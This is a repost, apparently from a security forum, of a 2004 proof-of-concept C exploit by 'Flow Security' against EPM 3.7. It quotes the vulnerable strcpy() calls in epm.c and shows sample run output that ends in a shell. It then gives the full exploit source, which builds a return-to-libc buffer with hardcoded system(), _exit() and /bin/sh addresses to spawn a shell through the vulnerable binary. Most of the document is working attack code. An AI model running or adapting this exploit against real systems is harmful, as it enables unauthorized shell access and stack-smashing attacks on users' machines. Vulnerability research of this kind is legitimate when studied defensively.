文章作者:
setnf@flowsecurity.org复制内容到剪贴板
代码:
/*
Details
Vulnerable Systems:
* EPM version 3.7
Due to an unsafe copying of parameters from the command line using strcpy() in epm.c, the stack can be smashed and the return address overwritten. A small excerpt from the code is presented:
--- epm.c ---
350: else if (strchr(argv[i], '=') != NULL)
351: putenv(argv[i]);
352: else if (prodname[0] == '\0')
353: strcpy(prodname, argv[i]);
354: else if (listname[0] == '\0')
355: strcpy(listname, argv[i]);
--- epm.c ---
Running the exploit would yield:
[!] Usage: ./flow-epm <path> <offset>
flowsecurity $ ./flow-epm ./epm 15
[*] Program name : [./epm]
[*] Offset : [15]
[*] system() address : [0x4006d4b0]
[*] _exit() address : [0x400d8088]
[*] /bin/sh address : [0x40151439]
[!]: Bad address
sh-2.05b$
*
* _____ _
* | ___| | _____ ___
* | |_ | |/ _ \ \ /\ / /
* | _| | | (_) \ V V /
* |_| |_|\___/ \_/\_/
* Security Group.
*
* Description: flow-epm.c ([url]www.flowsecurity.org[/url])
*
* Proof of Concept local RetLibc exploit for EPM - 3.7(not suid
by default).
*
* It has been successfull tested on:
*
* Suse Linux 9.0
* Greets:
*
* Luiz Fernando Camargo
* Jefferson Cechinel
* Gerrit
* fAil
* newbug
*
* Date: 29'Sep 2004
*
*
* Author:
* Thyago Silva - [email]setnf@flowsecurity.org[/email]
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>
#define PNAME "./epm" // program name
#define NOP 0x90 // No Operation
/* You need change the addr's */
#define SYSTEM 0x4006d4b0 // system() address in libc
#define EXIT 0x400d8088 // _exit() address in libc
#define SHELL 0x40151439 // /bin/sh address in libc
int main(int argc, char *argv[])
{
if(argc < 3 || argc > 3) {
fprintf(stderr, "############## Flow Security ##############\n");
fprintf(stderr, "# RetLibc Exploit for EPM - 3.7 #\n");
fprintf(stderr, "# [email]setnf@flowsecurity.org[/email] #\n");
fprintf(stderr, "###########################################\n\n");
fprintf(stderr, "[!] Usage: %s <path> <offset>\n\n", argv[0]);
exit(0); }
int TBUFF = ((256 + 4) + (4 * 3) + 1); /* total buffer */
int NBUFF = ((256 / 4) + atoi(argv[2])); /* NOP buffer with offset */
fprintf(stderr, "[*] Program name : [%s]\n", argv[1]);
fprintf(stderr, "[*] Offset : [%d]\n", atoi(argv[2]));
char buf[TBUFF];
int *p = (int *)buf;
fprintf(stderr, "[*] system() address : [%p]\n", SYSTEM);
fprintf(stderr, "[*] _exit() address : [%p]\n", EXIT);
fprintf(stderr, "[*] /bin/sh address : [%p]\n", SHELL);
/* fill the first part of the buffer */
memset(buf, NOP, TBUFF);
p += NBUFF;
/* prepare the stack */
*p++ = SYSTEM;
*p++ = EXIT;
*p++ = SHELL;
*p = 0x0;
/* run the vulnerable program */
execl(argv[1], argv[1] + 2, buf, NULL);
perror("\n[!]");
}
